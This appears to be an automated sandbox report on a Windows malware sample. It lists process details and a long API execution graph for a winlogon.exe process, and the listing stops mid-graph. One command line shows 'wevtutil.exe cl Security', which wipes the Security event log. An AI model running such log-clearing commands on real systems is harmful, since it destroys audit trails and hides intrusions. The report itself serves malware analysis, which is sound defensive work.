Start time:21:38:59
Start date:12/02/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
Imagebase:0x4a0d0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: wevtutil.exe PID: 3772 Parent PID: 3748

General

Start time:21:39:00
Start date:12/02/2018
Path:C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):false
Commandline:wevtutil.exe cl Security
Imagebase:0x4a0000
File size:175616 bytes
MD5 hash:81538B795F922B8DA6FD897EFB04B5EE
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: LogonUI.exe PID: 3840 Parent PID: 380

General

Start time:21:39:04
Start date:12/02/2018
Path:C:\Windows\System32\LogonUI.exe
Wow64 process (32bit):false
Commandline:'LogonUI.exe' /flags:0x0
Imagebase:0xcc0000
File size:10752 bytes
MD5 hash:3EF0D8AB08385AAB5802E773511A2E6A
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Analysis Process: LogonUI.exe PID: 3928 Parent PID: 332

General

Start time:21:39:06
Start date:12/02/2018
Path:C:\Windows\System32\LogonUI.exe
Wow64 process (32bit):false
Commandline:unknown
Imagebase:0xcc0000
File size:10752 bytes
MD5 hash:3EF0D8AB08385AAB5802E773511A2E6A
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: winlogon.exe PID: 3216 Parent PID: 2940

    Execution Graph

    Execution Coverage:13.6%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:7.1%
    Total number of Nodes:2000
    Total number of Limit Nodes:72

    Graph

    execution_graph 16890 d7b270 16893 d767a9 16890->16893 16894 d767b2 16893->16894 16895 d767bb 16893->16895 16894->16895 16896 d766a8 50 API calls 16894->16896 16896->16895 15319 d72610 15324 d723de 15319->15324 15322 d72638 15325 d72409 15324->15325 15335 d72552 15325->15335 15339 d783d8 15325->15339 15326 d72122 __freea 19 API calls 15327 d725fc 15326->15327 15328 d70269 ___std_exception_copy 25 API calls 15327->15328 15329 d7255b 15328->15329 15329->15322 15336 d78b26 15329->15336 15332 d783d8 45 API calls 15333 d725bb 15332->15333 15334 d783d8 45 API calls 15333->15334 15333->15335 15334->15335 15335->15326 15335->15329 15364 d784fb 15336->15364 15338 d78b41 15338->15322 15340 d783e7 15339->15340 15341 d78427 15339->15341 15343 d783ec 15340->15343 15344 d78409 15340->15344 15353 d78444 15341->15353 15346 d72122 __freea 19 API calls 15343->15346 15344->15341 15347 d78413 15344->15347 15345 d7259c 15345->15332 15345->15335 15348 d783f1 15346->15348 15349 d72122 __freea 19 API calls 15347->15349 15350 d70269 ___std_exception_copy 25 API calls 15348->15350 15351 d78418 15349->15351 15350->15345 15352 d70269 ___std_exception_copy 25 API calls 15351->15352 15352->15345 15354 d78456 15353->15354 15361 d7848e ___ascii_strnicmp 15353->15361 15355 d6e412 __Stoull 37 API calls 15354->15355 15358 d78464 15355->15358 15356 d7847e 15357 d72122 __freea 19 API calls 15356->15357 15359 d78483 15357->15359 15358->15356 15363 d78490 15358->15363 15360 d70269 ___std_exception_copy 25 API calls 15359->15360 15360->15361 15361->15345 15362 d73a5e 45 API calls 15362->15363 15363->15361 15363->15362 15365 d78507 ___InternalCxxFrameHandler 15364->15365 15366 d78515 15365->15366 15369 d7854e 15365->15369 15367 d72122 __freea 19 API calls 15366->15367 15368 d7851a 15367->15368 15370 d70269 ___std_exception_copy 25 API calls 15368->15370 15375 d78ad5 15369->15375 15374 d78524 ___InternalCxxFrameHandler 15370->15374 15374->15338 15376 d72bdd __wsopen_s 30 API calls 15375->15376 15377 d78aeb 15376->15377 15378 d78572 15377->15378 15386 d78b46 15377->15386 15382 d7859b 15378->15382 15381 d717c5 __freea 19 API calls 15381->15378 15383 d785a1 15382->15383 15385 d785c5 15382->15385 15797 d76cf8 LeaveCriticalSection 15383->15797 15385->15374 15431 d788a9 15386->15431 15389 d78b78 15391 d7210f __wsopen_s 19 API calls 15389->15391 15390 d78b91 15449 d76d1b 15390->15449 15410 d78b7d 15391->15410 15393 d78b96 15394 d78bb6 15393->15394 15395 d78b9f 15393->15395 15462 d78814 CreateFileW 15394->15462 15398 d7210f __wsopen_s 19 API calls 15395->15398 15396 d72122 __freea 19 API calls 15430 d78b13 15396->15430 15399 d78ba4 15398->15399 15401 d72122 __freea 19 API calls 15399->15401 15400 d78c6c GetFileType 15404 d78c77 GetLastError 15400->15404 15407 d78cbe 15400->15407 15401->15410 15402 d78c41 GetLastError 15406 d720ec __wsopen_s 19 API calls 15402->15406 15403 d78bef 15403->15400 15403->15402 15463 d78814 CreateFileW 15403->15463 15405 d720ec __wsopen_s 19 API calls 15404->15405 15409 d78c85 CloseHandle 15405->15409 15406->15410 15464 d76c64 15407->15464 15409->15410 15413 d78cae 15409->15413 15410->15396 15411 d78c34 15411->15400 15411->15402 15414 d72122 __freea 19 API calls 15413->15414 15414->15410 15415 d78d2b 15420 d78d58 15415->15420 15488 d785c7 15415->15488 15421 d7294f __wsopen_s 28 API calls 15420->15421 15421->15430 15422 d78d69 15423 d78de7 CloseHandle 15422->15423 15422->15430 15514 d78814 CreateFileW 15423->15514 15425 d78e12 15426 d78e1c GetLastError 15425->15426 15425->15430 15427 d720ec __wsopen_s 19 API calls 15426->15427 15428 d78e28 15427->15428 15515 d76e2d 15428->15515 15430->15381 15432 d788e4 15431->15432 15433 d788ca 15431->15433 15524 d78839 15432->15524 15433->15432 15435 d72122 __freea 19 API calls 15433->15435 15436 d788d9 15435->15436 15437 d70269 ___std_exception_copy 25 API calls 15436->15437 15437->15432 15438 d7894b 15444 d7899e 15438->15444 15531 d70e64 15438->15531 15439 d7891c 15439->15438 15441 d72122 __freea 19 API calls 15439->15441 15442 d78940 15441->15442 15446 d70269 ___std_exception_copy 25 API calls 15442->15446 15443 d78999 15443->15444 15445 d78a18 15443->15445 15444->15389 15444->15390 15447 d70296 ___std_exception_copy 11 API calls 15445->15447 15446->15438 15448 d78a24 15447->15448 15450 d76d27 ___InternalCxxFrameHandler 15449->15450 15538 d75c0f EnterCriticalSection 15450->15538 15452 d76d2e 15454 d76d53 15452->15454 15457 d76dc1 EnterCriticalSection 15452->15457 15461 d76d75 15452->15461 15455 d76afa __wsopen_s 20 API calls 15454->15455 15458 d76d58 15455->15458 15456 d76d9e ___InternalCxxFrameHandler 15456->15393 15459 d76dce LeaveCriticalSection 15457->15459 15457->15461 15458->15461 15542 d76c41 EnterCriticalSection 15458->15542 15459->15452 15539 d76e24 15461->15539 15462->15403 15463->15411 15465 d76cdc 15464->15465 15467 d76c73 15464->15467 15466 d72122 __freea 19 API calls 15465->15466 15468 d76ce1 15466->15468 15467->15465 15469 d76c99 __wsopen_s 15467->15469 15470 d7210f __wsopen_s 19 API calls 15468->15470 15471 d76cc9 15469->15471 15472 d76cc3 SetStdHandle 15469->15472 15470->15471 15471->15415 15473 d78a25 15471->15473 15472->15471 15474 d78a4b 15473->15474 15475 d78a4f 15473->15475 15474->15415 15475->15474 15544 d75316 15475->15544 15478 d78a87 15547 d75819 15478->15547 15479 d78a71 15480 d7210f __wsopen_s 19 API calls 15479->15480 15484 d78a76 15480->15484 15482 d78a99 15483 d78aaf 15482->15483 15610 d7b481 15482->15610 15483->15484 15486 d75316 __wsopen_s 27 API calls 15483->15486 15484->15474 15485 d72122 __freea 19 API calls 15484->15485 15485->15474 15486->15484 15489 d785fa 15488->15489 15513 d785f3 15488->15513 15490 d70e64 __wsopen_s 25 API calls 15489->15490 15493 d7861b 15489->15493 15491 d78612 15490->15491 15492 d78809 15491->15492 15491->15493 15494 d70296 ___std_exception_copy 11 API calls 15492->15494 15496 d786bf 15493->15496 15499 d75316 __wsopen_s 27 API calls 15493->15499 15493->15513 15495 d78813 15494->15495 15497 d75819 __wsopen_s 37 API calls 15496->15497 15500 d7875e 15496->15500 15502 d78748 15496->15502 15496->15513 15498 d7871d 15497->15498 15498->15500 15498->15502 15504 d78770 15498->15504 15505 d78759 15498->15505 15506 d78792 15498->15506 15503 d786d9 15499->15503 15501 d72122 __freea 19 API calls 15500->15501 15501->15513 15502->15500 15512 d732c5 __wsopen_s 61 API calls 15502->15512 15502->15513 15503->15502 15507 d75316 __wsopen_s 27 API calls 15503->15507 15504->15506 15508 d78777 15504->15508 15509 d72122 __freea 19 API calls 15505->15509 15510 d75316 __wsopen_s 27 API calls 15506->15510 15507->15496 15511 d75316 __wsopen_s 27 API calls 15508->15511 15509->15500 15510->15502 15511->15502 15512->15502 15513->15420 15513->15422 15514->15425 15516 d76ea3 15515->15516 15518 d76e3c 15515->15518 15517 d72122 __freea 19 API calls 15516->15517 15519 d76ea8 15517->15519 15518->15516 15520 d76e66 __wsopen_s 15518->15520 15521 d7210f __wsopen_s 19 API calls 15519->15521 15522 d76e93 15520->15522 15523 d76e8d SetStdHandle 15520->15523 15521->15522 15522->15430 15523->15522 15525 d78851 15524->15525 15526 d7886c 15525->15526 15527 d72122 __freea 19 API calls 15525->15527 15526->15439 15528 d78890 15527->15528 15529 d70269 ___std_exception_copy 25 API calls 15528->15529 15530 d7889b 15529->15530 15530->15439 15532 d70e85 15531->15532 15533 d70e70 15531->15533 15532->15443 15534 d72122 __freea 19 API calls 15533->15534 15535 d70e75 15534->15535 15536 d70269 ___std_exception_copy 25 API calls 15535->15536 15537 d70e80 15536->15537 15537->15443 15538->15452 15543 d75c57 LeaveCriticalSection 15539->15543 15541 d76e2b 15541->15456 15542->15461 15543->15541 15650 d7527d 15544->15650 15548 d7582b 15547->15548 15551 d75843 15547->15551 15550 d7210f __wsopen_s 19 API calls 15548->15550 15549 d75bad 15552 d7210f __wsopen_s 19 API calls 15549->15552 15553 d75830 15550->15553 15551->15549 15555 d75888 15551->15555 15556 d75bb2 15552->15556 15554 d72122 __freea 19 API calls 15553->15554 15557 d75838 15554->15557 15555->15557 15558 d75893 15555->15558 15565 d758c3 15555->15565 15559 d72122 __freea 19 API calls 15556->15559 15557->15482 15560 d7210f __wsopen_s 19 API calls 15558->15560 15561 d758a0 15559->15561 15562 d75898 15560->15562 15564 d70269 ___std_exception_copy 25 API calls 15561->15564 15563 d72122 __freea 19 API calls 15562->15563 15563->15561 15564->15557 15566 d758dc 15565->15566 15567 d75902 15565->15567 15568 d7591e 15565->15568 15566->15567 15602 d758e9 15566->15602 15569 d7210f __wsopen_s 19 API calls 15567->15569 15571 d717ff __wsopen_s 20 API calls 15568->15571 15570 d75907 15569->15570 15573 d72122 __freea 19 API calls 15570->15573 15574 d75935 15571->15574 15572 d78f9e __wsopen_s 25 API calls 15575 d75a87 15572->15575 15576 d7590e 15573->15576 15577 d717c5 __freea 19 API calls 15574->15577 15579 d75afd 15575->15579 15583 d75aa0 GetConsoleMode 15575->15583 15580 d70269 ___std_exception_copy 25 API calls 15576->15580 15578 d7593e 15577->15578 15582 d717c5 __freea 19 API calls 15578->15582 15581 d75b01 ReadFile 15579->15581 15609 d75919 __wsopen_s 15580->15609 15584 d75b75 GetLastError 15581->15584 15585 d75b1b 15581->15585 15586 d75945 15582->15586 15583->15579 15587 d75ab1 15583->15587 15588 d75b82 15584->15588 15594 d75ad9 15584->15594 15585->15584 15596 d75af2 15585->15596 15589 d7596a 15586->15589 15590 d7594f 15586->15590 15587->15581 15591 d75ab7 ReadConsoleW 15587->15591 15592 d72122 __freea 19 API calls 15588->15592 15598 d75316 __wsopen_s 27 API calls 15589->15598 15593 d72122 __freea 19 API calls 15590->15593 15591->15596 15597 d75ad3 GetLastError 15591->15597 15599 d75b87 15592->15599 15600 d75954 15593->15600 15601 d720ec __wsopen_s 19 API calls 15594->15601 15594->15609 15595 d717c5 __freea 19 API calls 15595->15557 15605 d75b40 15596->15605 15606 d75b57 15596->15606 15596->15609 15597->15594 15598->15602 15604 d7210f __wsopen_s 19 API calls 15599->15604 15603 d7210f __wsopen_s 19 API calls 15600->15603 15601->15609 15602->15572 15603->15609 15604->15609 15672 d75648 15605->15672 15606->15609 15684 d75488 15606->15684 15609->15595 15611 d75316 __wsopen_s 27 API calls 15610->15611 15612 d7b49a 15611->15612 15613 d7b4ac 15612->15613 15615 d75316 __wsopen_s 27 API calls 15612->15615 15614 d72122 __freea 19 API calls 15613->15614 15617 d7b4b1 15614->15617 15616 d7b4c2 15615->15616 15616->15613 15620 d7b4ce 15616->15620 15617->15483 15618 d7b5ba 15623 d75316 __wsopen_s 27 API calls 15618->15623 15649 d7b56e 15618->15649 15619 d7b4ec 15621 d71890 _GetRangeOfTrysToCheck 19 API calls 15619->15621 15620->15618 15620->15619 15624 d7b4f8 15621->15624 15622 d75316 __wsopen_s 27 API calls 15625 d7b580 15622->15625 15627 d7b5d1 15623->15627 15626 d7b500 15624->15626 15636 d7b510 __wsopen_s 15624->15636 15625->15617 15629 d72122 __freea 19 API calls 15625->15629 15628 d72122 __freea 19 API calls 15626->15628 15627->15625 15631 d76ebe __wsopen_s 25 API calls 15627->15631 15630 d7b505 15628->15630 15629->15617 15633 d72122 __freea 19 API calls 15630->15633 15632 d7b5e1 SetEndOfFile 15631->15632 15634 d7b5ed 15632->15634 15632->15649 15635 d7b5ad 15633->15635 15637 d72122 __freea 19 API calls 15634->15637 15638 d717c5 __freea 19 API calls 15635->15638 15642 d7b593 15636->15642 15646 d7b55f __wsopen_s 15636->15646 15694 d733b0 15636->15694 15639 d7b5f2 15637->15639 15638->15617 15641 d7210f __wsopen_s 19 API calls 15639->15641 15644 d7210f __wsopen_s 19 API calls 15642->15644 15645 d7b598 15644->15645 15645->15630 15647 d72122 __freea 19 API calls 15645->15647 15648 d717c5 __freea 19 API calls 15646->15648 15647->15630 15648->15649 15649->15622 15659 d76ebe 15650->15659 15652 d7528f 15653 d752a8 SetFilePointerEx 15652->15653 15654 d75297 15652->15654 15656 d752c0 GetLastError 15653->15656 15658 d7529c 15653->15658 15655 d72122 __freea 19 API calls 15654->15655 15655->15658 15657 d720ec __wsopen_s 19 API calls 15656->15657 15657->15658 15658->15478 15658->15479 15660 d76ecb 15659->15660 15663 d76ee0 15659->15663 15661 d7210f __wsopen_s 19 API calls 15660->15661 15662 d76ed0 15661->15662 15665 d72122 __freea 19 API calls 15662->15665 15664 d7210f __wsopen_s 19 API calls 15663->15664 15666 d76f05 15663->15666 15667 d76f10 15664->15667 15668 d76ed8 15665->15668 15666->15652 15669 d72122 __freea 19 API calls 15667->15669 15668->15652 15670 d76f18 15669->15670 15671 d70269 ___std_exception_copy 25 API calls 15670->15671 15671->15668 15689 d75331 15672->15689 15676 d75761 GetLastError 15678 d720ec __wsopen_s 19 API calls 15676->15678 15677 d75690 15677->15609 15678->15677 15679 d756d8 15681 d72122 __freea 19 API calls 15679->15681 15680 d756e8 15682 d75316 __wsopen_s 27 API calls 15680->15682 15683 d756a3 MultiByteToWideChar 15680->15683 15681->15677 15682->15683 15683->15676 15683->15677 15685 d754c0 15684->15685 15686 d75618 15685->15686 15687 d75550 ReadFile 15685->15687 15688 d75316 __wsopen_s 27 API calls 15685->15688 15686->15609 15687->15685 15688->15685 15692 d75366 15689->15692 15690 d7545c 15690->15677 15690->15679 15690->15680 15690->15683 15691 d753cc ReadFile 15691->15692 15692->15690 15692->15691 15693 d75316 __wsopen_s 27 API calls 15692->15693 15693->15692 15695 d733de 15694->15695 15734 d733d7 15694->15734 15696 d733e2 15695->15696 15699 d73401 15695->15699 15698 d7210f __wsopen_s 19 API calls 15696->15698 15697 d6abe4 __Stoull 5 API calls 15700 d735b8 15697->15700 15701 d733e7 15698->15701 15702 d73435 15699->15702 15703 d73452 15699->15703 15700->15636 15706 d7210f __wsopen_s 19 API calls 15702->15706 15704 d73468 15703->15704 15708 d75316 __wsopen_s 27 API calls 15703->15708 15708->15704 15734->15697 15797->15385 15141 d72063 15149 d74d9c 15141->15149 15144 d71fde __CreateFrameInfo 19 API calls 15146 d7207f 15144->15146 15145 d7208c 15146->15145 15156 d7208f 15146->15156 15148 d72077 15150 d74c37 _GetRangeOfTrysToCheck 5 API calls 15149->15150 15151 d74dc3 15150->15151 15152 d74ddb TlsAlloc 15151->15152 15153 d74dcc 15151->15153 15152->15153 15154 d6abe4 __Stoull 5 API calls 15153->15154 15155 d7206d 15154->15155 15155->15144 15155->15148 15157 d72099 15156->15157 15158 d7209f 15156->15158 15160 d74df2 15157->15160 15158->15148 15161 d74c37 _GetRangeOfTrysToCheck 5 API calls 15160->15161 15162 d74e19 15161->15162 15163 d74e31 TlsFree 15162->15163 15166 d74e25 15162->15166 15163->15166 15164 d6abe4 __Stoull 5 API calls 15165 d74e42 15164->15165 15165->15158 15166->15164 14942 d654e0 14943 d65516 14942->14943 14954 d655e3 14942->14954 14944 d65529 GetFileAttributesA 14943->14944 14943->14954 14945 d6553b GetFileAttributesA 14944->14945 14944->14954 14946 d6554b 14945->14946 14945->14954 14959 d61ec0 14946->14959 14948 d65569 14950 d655d6 14948->14950 14970 d67810 InitializeCriticalSection 14948->14970 14952 d7009a ___std_exception_copy 20 API calls 14950->14952 14950->14954 14951 d655b7 14971 d67600 14951->14971 14952->14954 14957 d655ce 14995 d67790 14957->14995 14960 d61ede 14959->14960 14962 d61ef2 ___scrt_get_show_window_mode 14959->14962 14961 d6abe4 __Stoull 5 API calls 14960->14961 14963 d61eec 14961->14963 14964 d6e60e 41 API calls 14962->14964 14963->14948 14965 d61f17 14964->14965 14966 d61dd0 25 API calls 14965->14966 14967 d61f28 14966->14967 14968 d6abe4 __Stoull 5 API calls 14967->14968 14969 d61f34 14968->14969 14969->14948 14970->14951 14972 d6761e 14971->14972 14978 d655c6 14971->14978 14973 d67667 14972->14973 14975 d67623 14972->14975 14976 d6b97b 28 API calls 14973->14976 14974 d6762a EnterCriticalSection 14977 d67b20 28 API calls 14974->14977 14975->14974 14975->14978 14979 d67671 14976->14979 14980 d6763d LeaveCriticalSection 14977->14980 14981 d67680 14978->14981 14980->14975 14982 d67696 14981->14982 14983 d6768f 14981->14983 14982->14983 14984 d702c9 ___std_exception_copy 20 API calls 14982->14984 14983->14957 14989 d676ab ___scrt_get_show_window_mode 14984->14989 14985 d676b5 14985->14957 14986 d676d6 CreateEventA 14986->14989 14990 d67772 14986->14990 14987 d67751 WaitForMultipleObjects 15006 d67cb0 14987->15006 14989->14985 14989->14986 14989->14987 14989->14990 14993 d6770f CreateThread WaitForSingleObject CloseHandle 14989->14993 14991 d67cb0 22 API calls 14990->14991 14994 d67780 14991->14994 14992 d67768 14992->14957 14993->14989 14993->14990 15013 d67d40 14993->15013 14994->14957 14996 d677f6 DeleteCriticalSection 14995->14996 15001 d67799 14995->15001 14997 d68420 14996->14997 15000 d70279 25 API calls 14997->15000 15005 d68438 14997->15005 14998 d677ec 14998->14996 14999 d677d1 14999->14998 15002 d7009a ___std_exception_copy 20 API calls 14999->15002 15003 d68494 15000->15003 15001->14999 15004 d677be CloseHandle 15001->15004 15002->14998 15004->15001 15005->14950 15007 d67cb9 15006->15007 15008 d67cbd 15006->15008 15007->14992 15009 d67d07 15008->15009 15010 d67ce6 TerminateThread CloseHandle 15008->15010 15011 d7009a ___std_exception_copy 20 API calls 15009->15011 15012 d67d22 15009->15012 15010->15008 15011->15012 15012->14992 15014 d67d4d 15013->15014 15015 d67d58 15013->15015 15016 d67d81 FindHandler 15015->15016 15017 d67d7a SetEvent 15015->15017 15018 d67db8 EnterCriticalSection 15016->15018 15019 d67e03 15016->15019 15020 d67dfd Sleep 15016->15020 15021 d67dd9 LeaveCriticalSection 15016->15021 15017->15016 15018->15016 15020->15016 15024 d65170 15021->15024 15025 d654a0 15024->15025 15028 d651b2 ___scrt_get_show_window_mode 15024->15028 15026 d6abe4 __Stoull 5 API calls 15025->15026 15027 d654cb Sleep 15026->15027 15027->15016 15028->15025 15029 d619f0 49 API calls 15028->15029 15030 d65211 ___scrt_get_show_window_mode 15029->15030 15031 d6523e InitializeCriticalSection 15030->15031 15032 d67570 30 API calls 15031->15032 15044 d65285 15032->15044 15033 d6547c DeleteCriticalSection 15035 d68340 25 API calls 15033->15035 15034 d652a9 MultiByteToWideChar 15034->15044 15035->15025 15036 d702c9 ___std_exception_copy 20 API calls 15038 d652de MultiByteToWideChar 15036->15038 15037 d65331 MultiByteToWideChar 15037->15044 15038->15044 15039 d654a4 15040 d6b97b 28 API calls 15039->15040 15040->15025 15041 d702c9 ___std_exception_copy 20 API calls 15042 d65356 MultiByteToWideChar 15041->15042 15042->15044 15043 d653a2 MultiByteToWideChar 15043->15044 15044->15033 15044->15034 15044->15036 15044->15037 15044->15039 15044->15041 15044->15043 15045 d702c9 ___std_exception_copy 20 API calls 15044->15045 15047 d7009a 20 API calls ___std_exception_copy 15044->15047 15049 d645d0 63 API calls 15044->15049 15050 d64c30 15044->15050 15046 d653d0 MultiByteToWideChar 15045->15046 15046->15044 15047->15044 15049->15044 15051 d7d900 __wsopen_s 15050->15051 15052 d64c40 CoInitializeEx 15051->15052 15053 d65155 15052->15053 15054 d64c74 CoInitializeSecurity 15052->15054 15055 d6abe4 __Stoull 5 API calls 15053->15055 15056 d64c90 15054->15056 15057 d64c9b 9 API calls 15054->15057 15060 d65166 15055->15060 15056->15057 15061 d6514f CoUninitialize 15056->15061 15058 d64d4f SysAllocString SysAllocString SysAllocString 15057->15058 15059 d6513a SysFreeString SysFreeString SysFreeString LocalFree 15057->15059 15063 d64db3 15058->15063 15059->15061 15060->15044 15061->15053 15064 d64dc1 CoSetProxyBlanket 15063->15064 15065 d6511e SysFreeString SysFreeString SysFreeString 15063->15065 15066 d64de0 CoSetProxyBlanket SysAllocString SysAllocString 15064->15066 15067 d65114 15064->15067 15065->15059 15070 d64e46 15066->15070 15067->15065 15069 d6510b SysFreeString SysFreeString 15069->15067 15071 d650dd 15070->15071 15072 d64e9c VariantClear 15070->15072 15071->15069 15073 d64ed1 SysAllocString 15072->15073 15074 d64efe SysAllocString 15073->15074 15075 d64f2b GetModuleFileNameW CreateFileW 15074->15075 15076 d64f6d GetFileSize SafeArrayCreate 15075->15076 15077 d65072 15075->15077 15078 d6508b 15076->15078 15079 d64f9f SafeArrayAccessData 15076->15079 15077->15069 15081 d6508f CloseHandle 15078->15081 15079->15078 15080 d64fb3 ReadFile SafeArrayUnaccessData 15079->15080 15082 d64ff9 15080->15082 15081->15077 15082->15081 15083 d6503a 15082->15083 15086 d644b0 SysAllocString SysAllocString 15083->15086 15085 d6505e CloseHandle 15085->15077 15087 d644ec 15086->15087 15088 d645b4 SysFreeString SysFreeString 15087->15088 15089 d645a2 15087->15089 15090 d64535 SysAllocString 15087->15090 15088->15085 15089->15088 15091 d64565 SysFreeString 15090->15091 15091->15089 15167 d767aa 15170 d766a8 15167->15170 15171 d71f5a _GetRangeOfTrysToCheck 37 API calls 15170->15171 15172 d766b5 15171->15172 15173 d767c7 __Stoull 37 API calls 15172->15173 15174 d766bd 15173->15174 15190 d7643c 15174->15190 15177 d717ff __wsopen_s 20 API calls 15178 d766e5 15177->15178 15180 d76717 15178->15180 15197 d76869 15178->15197 15182 d717c5 __freea 19 API calls 15180->15182 15184 d766d4 15182->15184 15183 d76712 15185 d72122 __freea 19 API calls 15183->15185 15185->15180 15186 d7675b 15186->15180 15207 d76312 15186->15207 15187 d7672f 15187->15186 15188 d717c5 __freea 19 API calls 15187->15188 15188->15186 15191 d6e412 __Stoull 37 API calls 15190->15191 15192 d7644e 15191->15192 15193 d7645d GetOEMCP 15192->15193 15194 d7646f 15192->15194 15196 d76486 15193->15196 15195 d76474 GetACP 15194->15195 15194->15196 15195->15196 15196->15177 15196->15184 15198 d7643c 39 API calls 15197->15198 15199 d76888 15198->15199 15200 d7688f 15199->15200 15203 d768d9 IsValidCodePage 15199->15203 15206 d768fe ___scrt_get_show_window_mode 15199->15206 15201 d6abe4 __Stoull 5 API calls 15200->15201 15202 d7670a 15201->15202 15202->15183 15202->15187 15203->15200 15204 d768eb GetCPInfo 15203->15204 15204->15200 15204->15206 15210 d76514 GetCPInfo 15206->15210 15283 d762cf 15207->15283 15209 d76336 15209->15180 15211 d7654e 15210->15211 15212 d765f8 15210->15212 15220 d7721a 15211->15220 15214 d6abe4 __Stoull 5 API calls 15212->15214 15216 d766a4 15214->15216 15216->15200 15219 d792b3 42 API calls 15219->15212 15221 d6e412 __Stoull 37 API calls 15220->15221 15222 d7723a MultiByteToWideChar 15221->15222 15224 d77278 15222->15224 15225 d77310 15222->15225 15227 d717ff __wsopen_s 20 API calls 15224->15227 15231 d77299 __alloca_probe_16 ___scrt_get_show_window_mode 15224->15231 15226 d6abe4 __Stoull 5 API calls 15225->15226 15228 d765af 15226->15228 15227->15231 15234 d792b3 15228->15234 15229 d7730a 15239 d77337 15229->15239 15231->15229 15232 d772de MultiByteToWideChar 15231->15232 15232->15229 15233 d772fa GetStringTypeW 15232->15233 15233->15229 15235 d6e412 __Stoull 37 API calls 15234->15235 15236 d792c6 15235->15236 15243 d79096 15236->15243 15240 d77343 15239->15240 15242 d77354 15239->15242 15241 d717c5 __freea 19 API calls 15240->15241 15240->15242 15241->15242 15242->15225 15245 d790b1 15243->15245 15244 d790d7 MultiByteToWideChar 15248 d79101 15244->15248 15256 d7928b 15244->15256 15245->15244 15246 d6abe4 __Stoull 5 API calls 15247 d765d0 15246->15247 15247->15219 15250 d79122 __alloca_probe_16 15248->15250 15251 d717ff __wsopen_s 20 API calls 15248->15251 15249 d7916b MultiByteToWideChar 15252 d791d7 15249->15252 15253 d79184 15249->15253 15250->15249 15250->15252 15251->15250 15255 d77337 __freea 19 API calls 15252->15255 15270 d74fb1 15253->15270 15255->15256 15256->15246 15258 d791e6 15260 d79207 __alloca_probe_16 15258->15260 15261 d717ff __wsopen_s 20 API calls 15258->15261 15259 d791ae 15259->15252 15262 d74fb1 11 API calls 15259->15262 15263 d7927c 15260->15263 15265 d74fb1 11 API calls 15260->15265 15261->15260 15262->15252 15264 d77337 __freea 19 API calls 15263->15264 15264->15252 15266 d7925b 15265->15266 15266->15263 15267 d7926a WideCharToMultiByte 15266->15267 15267->15263 15268 d792aa 15267->15268 15269 d77337 __freea 19 API calls 15268->15269 15269->15252 15271 d74c37 _GetRangeOfTrysToCheck 5 API calls 15270->15271 15272 d74fd8 15271->15272 15273 d74fe1 15272->15273 15278 d75039 15272->15278 15276 d6abe4 __Stoull 5 API calls 15273->15276 15277 d75033 15276->15277 15277->15252 15277->15258 15277->15259 15279 d74c37 _GetRangeOfTrysToCheck 5 API calls 15278->15279 15280 d75060 15279->15280 15281 d6abe4 __Stoull 5 API calls 15280->15281 15282 d75021 LCMapStringW 15281->15282 15282->15273 15284 d762db ___InternalCxxFrameHandler 15283->15284 15291 d75c0f EnterCriticalSection 15284->15291 15286 d762e5 15292 d7633a 15286->15292 15290 d762fe ___InternalCxxFrameHandler 15290->15209 15291->15286 15304 d7ac3a 15292->15304 15294 d76388 15295 d7ac3a 25 API calls 15294->15295 15296 d763a4 15295->15296 15297 d7ac3a 25 API calls 15296->15297 15298 d763c2 15297->15298 15299 d717c5 __freea 19 API calls 15298->15299 15300 d762f2 15298->15300 15299->15300 15301 d76306 15300->15301 15318 d75c57 LeaveCriticalSection 15301->15318 15303 d76310 15303->15290 15305 d7ac4b 15304->15305 15312 d7ac47 15304->15312 15306 d7ac52 15305->15306 15308 d7ac65 ___scrt_get_show_window_mode 15305->15308 15307 d72122 __freea 19 API calls 15306->15307 15309 d7ac57 15307->15309 15311 d7ac93 15308->15311 15308->15312 15314 d7ac9c 15308->15314 15310 d70269 ___std_exception_copy 25 API calls 15309->15310 15310->15312 15313 d72122 __freea 19 API calls 15311->15313 15312->15294 15316 d7ac98 15313->15316 15314->15312 15315 d72122 __freea 19 API calls 15314->15315 15315->15316 15317 d70269 ___std_exception_copy 25 API calls 15316->15317 15317->15312 15318->15303 15882 d71e45 15883 d71e50 15882->15883 15884 d71e60 15882->15884 15888 d71e66 15883->15888 15887 d717c5 __freea 19 API calls 15887->15884 15889 d71e79 15888->15889 15890 d71e7f 15888->15890 15891 d717c5 __freea 19 API calls 15889->15891 15892 d717c5 __freea 19 API calls 15890->15892 15891->15890 15893 d71e8b 15892->15893 15894 d717c5 __freea 19 API calls 15893->15894 15895 d71e96 15894->15895 15896 d717c5 __freea 19 API calls 15895->15896 15897 d71ea1 15896->15897 15898 d717c5 __freea 19 API calls 15897->15898 15899 d71eac 15898->15899 15900 d717c5 __freea 19 API calls 15899->15900 15901 d71eb7 15900->15901 15902 d717c5 __freea 19 API calls 15901->15902 15903 d71ec2 15902->15903 15904 d717c5 __freea 19 API calls 15903->15904 15905 d71ecd 15904->15905 15906 d717c5 __freea 19 API calls 15905->15906 15907 d71ed8 15906->15907 15908 d717c5 __freea 19 API calls 15907->15908 15909 d71ee6 15908->15909 15914 d71d2c 15909->15914 15920 d71c38 15914->15920 15916 d71d50 15917 d71d7c 15916->15917 15933 d71c99 15917->15933 15919 d71da0 15919->15887 15921 d71c44 ___InternalCxxFrameHandler 15920->15921 15928 d75c0f EnterCriticalSection 15921->15928 15923 d71c78 15929 d71c8d 15923->15929 15924 d71c4e 15924->15923 15927 d717c5 __freea 19 API calls 15924->15927 15926 d71c85 ___InternalCxxFrameHandler 15926->15916 15927->15923 15928->15924 15932 d75c57 LeaveCriticalSection 15929->15932 15931 d71c97 15931->15926 15932->15931 15934 d71ca5 ___InternalCxxFrameHandler 15933->15934 15941 d75c0f EnterCriticalSection 15934->15941 15936 d71caf 15937 d71f0f _GetRangeOfTrysToCheck 19 API calls 15936->15937 15938 d71cc2 15937->15938 15942 d71cd8 15938->15942 15940 d71cd0 ___InternalCxxFrameHandler 15940->15919 15941->15936 15945 d75c57 